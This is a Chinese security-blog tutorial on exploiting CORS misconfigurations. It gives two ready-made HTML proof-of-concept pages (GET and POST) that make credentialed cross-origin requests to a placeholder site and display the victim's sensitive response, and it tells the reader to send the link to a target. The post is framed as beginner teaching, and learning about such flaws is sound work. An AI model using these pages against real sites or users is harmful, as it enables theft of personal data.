视觉盛宴-CORS漫画版

2023年8月5日10:54:02评论25 views字数 1326阅读4分25秒阅读模式

免责声明

由于传播、利用本公众号红云谈安全所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号红云谈安全及作者不为此承担任何责任，一旦造成后果请自行承担！本文为连载文章欢迎大家关注红云谈安全公众号！为了给大家带来更好的体验，今天尝试使用漫画结合方式来讲希望对初学者有所帮助，先写了一篇最基础的CORS，欢迎大家转发评论提意见！

在个人信息处、订单管理等存在敏感信息处抓包看响应包中抓到敏感数据，且为json响应。使用origin进行验证，Access-Control-Allow-Origin随着Origin源改变而改变，请求数据包中没有签名等验证，存在cors。

视觉盛宴-CORS漫画版搭建网站放入以下脚本：GET型CORS

<!DOCTYPE html>

<html>

<head>

 <title>cors liyon</title>

</head>

<body>

<script type="text/javascript">
 var http = new XMLHttpRequest();
 var url = 'https://www.xxx.com/address/front/detail';#就替换下URL地址为漏洞地址即可
 var params = '';
 http.open('get', url, true);
 http.withCredentials = true;
 http.onreadystatechange = function() {

  if(http.readyState == 4 && http.status == 200) {

   alert(http.responseText);

  }

 }

 http.send();

</script>

</body>

</html>

POST型CORS

<!DOCTYPE html>

<html>

<head>

 <title>cors liyon</title>

</head>

<body>

<script type="text/javascript">
 var http = new XMLHttpRequest();
 var url = 'https://www.xxx.com/api/address';#就替换下URL地址为漏洞地址即可
 var params = 'timeio=true';#替换下post中的参数
 http.open('POST', url, true);
 http.withCredentials = true;
 http.setRequestHeader("Content-type","application/json;charset=UTF-8");
 http.onreadystatechange = function() {

  if(http.readyState == 4 && http.status == 200) {

   alert(http.responseText);

  }

 }

 http.send(params);


</script>

</body>

</html>

将链接发送给对方

视觉盛宴-CORS漫画版

获取到个人信息

视觉盛宴-CORS漫画版

原文始发于微信公众号（红云谈安全）：视觉盛宴-CORS漫画版

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

视觉盛宴-CORS漫画版

file协议小解——为什么是file:///path

IT项目成本管理的含义与作用、意义

XSS 跨站脚本攻击详解

什么是国密？

《一文看懂内存马》

SQL注入简单介绍

Sqlserver SQL注入

XSS由浅入深

src漏洞挖掘之XSS由浅入深

一篇文章带小白从原理到靶场练习搞懂RCE命令执行漏洞

发表评论

在线咨询

微信